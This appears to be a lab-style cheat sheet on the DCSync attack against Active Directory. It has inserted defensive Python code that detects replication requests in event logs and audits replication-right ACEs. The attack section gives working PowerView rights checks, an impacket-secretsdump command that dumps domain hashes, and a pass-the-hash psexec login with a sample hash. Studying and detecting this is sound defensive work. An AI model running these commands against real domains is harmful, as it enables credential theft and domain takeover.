
dcsync-abuse

A DCSync attack can be performed with tools such as mimikatz, Invoke-DCSync, secretsdump.py or secretsdump.exe.

DCSync is a technique for stealing the Active Directory password database by using the built-in Directory Replication Service Remote Protocol, which Domain Controllers use to replicate domain data. An account holding the required replication rights can mimic a Domain Controller and retrieve users' NTLM password hashes.

The crux of the attack is asking a Domain Controller to replicate passwords via the DS-Replication-Get-Changes-All extended right. This is an extended access control right within AD that allows replication of secret data.
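Because the replication request above is a normal directory operation, the defender-side signal is the Security log: with "Directory Service Access" auditing enabled on the Domain Controllers, each replication request produces an event ID 4662 whose Properties field names the replication extended right by GUID and whose AccessMask carries the Control Access bit. The following is an added example (not from the original page) of detection logic run over such records; it assumes the events have already been exported to dicts with the field names used below, and the sample records are constructed.

```python
"""Flag DCSync-style replication requests in Windows Security event ID 4662 records.

Added example, not part of the original page. Assumes 4662 events have been
exported to dicts (e.g. from a SIEM or Get-WinEvent converted to JSON) with the
field names used below; the sample records are constructed.
"""
from __future__ import annotations

from typing import Iterable

# Extended-right GUIDs that appear in the Properties field of a 4662 event
# when a principal requests directory replication.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Rights that expose secrets; a request for these by a non-DC is the DCSync signature.
SECRET_RIGHTS = {"DS-Replication-Get-Changes-All", "DS-Replication-Get-Changes-In-Filtered-Set"}
CONTROL_ACCESS = 0x100  # "Control Access" bit of the 4662 AccessMask (extended right)


def replication_rights_in(properties: str) -> list[str]:
    """Names of replication rights whose GUID occurs in a 4662 Properties string."""
    text = properties.lower()
    return [name for guid, name in REPLICATION_RIGHTS.items() if guid in text]


def parse_mask(value) -> int:
    """AccessMask is logged as hex text such as '0x100'; tolerate ints and bad input."""
    try:
        return int(str(value), 0)
    except ValueError:
        return 0


def detect_dcsync(events: Iterable[dict], allowed_accounts: Iterable[str]) -> list[dict]:
    """Return one alert per 4662 event in which a non-allow-listed account requested replication.

    allowed_accounts should hold the DC machine accounts (e.g. 'DC01$') and any
    service account that replicates legitimately (e.g. a directory sync account).
    """
    allowed = {a.upper() for a in allowed_accounts}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        if (parse_mask(ev.get("AccessMask")) & CONTROL_ACCESS) == 0:
            continue  # not an extended-right access
        rights = replication_rights_in(ev.get("Properties", ""))
        if not rights:
            continue  # some other extended right
        subject = ev.get("SubjectUserName", "")
        if subject.upper() in allowed:
            continue  # expected replication partner
        alerts.append({
            "subject": subject,
            "domain": ev.get("SubjectDomainName", ""),
            "rights": rights,
            "severity": "high" if SECRET_RIGHTS & set(rights) else "low",
        })
    return alerts


# Constructed sample records; names reuse the page's example domain and user.
DOMAIN = "INLANEFREIGHT"
REPL_PROPS = "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
SAMPLE_EVENTS = [
    # Legitimate: a domain controller machine account replicating (DC01$ is assumed).
    {"EventID": 4662, "SubjectUserName": "DC01$", "SubjectDomainName": DOMAIN,
     "AccessMask": "0x100", "Properties": REPL_PROPS},
    # Suspicious: a user account requesting Get-Changes and Get-Changes-All.
    {"EventID": 4662, "SubjectUserName": "adunn", "SubjectDomainName": DOMAIN,
     "AccessMask": "0x100", "Properties": REPL_PROPS},
    # Benign: same user, a read-property access on an unrelated object (constructed GUID).
    {"EventID": 4662, "SubjectUserName": "adunn", "SubjectDomainName": DOMAIN,
     "AccessMask": "0x10", "Properties": "{deadbeef-0000-0000-0000-000000000000}"},
    # Unrelated event type.
    {"EventID": 4624, "SubjectUserName": "adunn", "SubjectDomainName": DOMAIN},
]

if __name__ == "__main__":
    for alert in detect_dcsync(SAMPLE_EVENTS, {"DC01$"}):
        print(f"[{alert['severity']}] {alert['domain']}\\{alert['subject']} "
              f"requested {', '.join(alert['rights'])}")
```

The allow list is the important tuning knob: DCs replicate constantly, so without it the rule is pure noise, and with a stale list a newly promoted DC becomes a false positive until it is added.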

Get the user's group membership (PowerView must be imported first)

Get-DomainUser -Identity adunn  |select samaccountname,objectsid,memberof,useraccountcontrol |fl

Get the user's replication rights on the domain object

$sid = "S-1-5-21-3842939050-3880317879-2865463114-1164"    # the user's SID from the previous query
Get-ObjectAcl "DC=inlanefreight,DC=local" -ResolveGUIDs | ? { ($_.ObjectAceType -match 'Replication-Get')} | ?{$_.SecurityIdentifier -match $sid} |select AceQualifier, ObjectDN, ActiveDirectoryRights,SecurityIdentifier,ObjectAceType | fl
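The query above checks one SID. The corresponding preventive control is to audit every principal holding replication rights on the domain naming context and compare against the set that should hold them (Domain Controllers, Enterprise Domain Controllers, Enterprise Read-only Domain Controllers, Domain Admins, Enterprise Admins and BUILTIN\Administrators). The following is an added example, not code from the page or from PowerView; it assumes the ACEs were exported to dicts with the same field names PowerView's Get-ObjectAcl -ResolveGUIDs prints (for instance via ConvertTo-Json), and the sample ACEs are constructed except for the domain SID, which is taken from the page.

```python
"""Audit which principals hold DCSync-capable replication rights on a domain object.

Added example, not part of the original page or of PowerView. Assumes ACEs were
exported from Get-ObjectAcl -ResolveGUIDs to dicts with the field names below;
the sample ACEs are constructed.
"""
from __future__ import annotations

from collections import defaultdict
from typing import Iterable

GET_CHANGES = "DS-Replication-Get-Changes"
GET_CHANGES_ALL = "DS-Replication-Get-Changes-All"
GET_CHANGES_FILTERED = "DS-Replication-Get-Changes-In-Filtered-Set"
REPLICATION_RIGHTS = {GET_CHANGES, GET_CHANGES_ALL, GET_CHANGES_FILTERED}

# Well-known SIDs that legitimately hold replication rights.
WELL_KNOWN_HOLDERS = {
    "S-1-5-9",       # Enterprise Domain Controllers
    "S-1-5-32-544",  # BUILTIN\Administrators
}
# Domain-relative RIDs of groups that legitimately hold replication rights.
EXPECTED_RIDS = {
    516,  # Domain Controllers
    498,  # Enterprise Read-only Domain Controllers
    512,  # Domain Admins
    519,  # Enterprise Admins
}


def expected_holders(domain_sid: str) -> set[str]:
    """Full SIDs of the principals expected to hold replication rights in this domain."""
    return WELL_KNOWN_HOLDERS | {f"{domain_sid}-{rid}" for rid in EXPECTED_RIDS}


def audit_replication_aces(aces: Iterable[dict], domain_sid: str,
                           extra_allowed: Iterable[str] = ()) -> list[dict]:
    """Return one finding per unexpected SID holding any replication right.

    A SID is flagged as dcsync_capable only when it holds both Get-Changes and
    Get-Changes-All, which together are what a password-replication request needs.
    Deny ACEs are skipped here; a real audit should evaluate them against the allows.
    """
    allowed = expected_holders(domain_sid) | set(extra_allowed)
    held: dict[str, set[str]] = defaultdict(set)
    for ace in aces:
        if ace.get("AceQualifier") != "AccessAllowed":
            continue
        right = ace.get("ObjectAceType", "")
        if right not in REPLICATION_RIGHTS:
            continue
        held[ace["SecurityIdentifier"]].add(right)
    findings = []
    for sid, rights in held.items():
        if sid in allowed:
            continue
        findings.append({
            "sid": sid,
            "rights": sorted(rights),
            "dcsync_capable": GET_CHANGES in rights and GET_CHANGES_ALL in rights,
        })
    return sorted(findings, key=lambda f: f["sid"])


DOMAIN_SID = "S-1-5-21-3842939050-3880317879-2865463114"  # domain SID from the page's example


def ace(sid: str, right: str, qualifier: str = "AccessAllowed") -> dict:
    """Build a constructed ACE record shaped like a Get-ObjectAcl -ResolveGUIDs entry."""
    return {"ObjectDN": "DC=inlanefreight,DC=local", "AceQualifier": qualifier,
            "ActiveDirectoryRights": "ExtendedRight", "ObjectAceType": right,
            "SecurityIdentifier": sid}


SAMPLE_ACES = [
    ace(f"{DOMAIN_SID}-516", GET_CHANGES),          # Domain Controllers (expected)
    ace(f"{DOMAIN_SID}-516", GET_CHANGES_ALL),
    ace("S-1-5-9", GET_CHANGES),                    # Enterprise Domain Controllers (expected)
    ace("S-1-5-9", GET_CHANGES_ALL),
    ace(f"{DOMAIN_SID}-1164", GET_CHANGES),         # the page's user adunn: holds all three
    ace(f"{DOMAIN_SID}-1164", GET_CHANGES_ALL),
    ace(f"{DOMAIN_SID}-1164", GET_CHANGES_FILTERED),
    ace(f"{DOMAIN_SID}-1105", GET_CHANGES),         # constructed account: Get-Changes only
    ace(f"{DOMAIN_SID}-1105", GET_CHANGES_ALL, "AccessDenied"),  # deny entry, ignored
]

if __name__ == "__main__":
    for finding in audit_replication_aces(SAMPLE_ACES, DOMAIN_SID):
        flag = "DCSYNC-CAPABLE" if finding["dcsync_capable"] else "partial"
        print(f"{flag:15} {finding['sid']}: {', '.join(finding['rights'])}")
```

Pass any deliberately provisioned accounts (for example a directory synchronisation service account) through extra_allowed rather than widening the built-in lists, so the audit keeps reporting anything that was not explicitly approved.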

Perform DCSync attack (impacket-secretsdump)

impacket-secretsdump <DC_Domain_Name>/<user>:<pass>@<DC_IP> -outputfile domain_hashes

Log in to the DC with the dumped Administrator hash

proxychains impacket-psexec INLANEFREIGHT.LOCAL/administrator@172.16.6.3 -hashes :27dedb1dab4d8545c6e1c66fba077da0

Extracting NTLM hashes and Kerberos keys with secretsdump.py (from a dumped NTDS file)

Useful secretsdump.py options

  • -just-dc-ntlm - dump only the NTLM hashes
  • -just-dc-user <username> - dump data for a specific user only
  • -pwd-last-set - show when each password was last changed
  • -history - dump password history
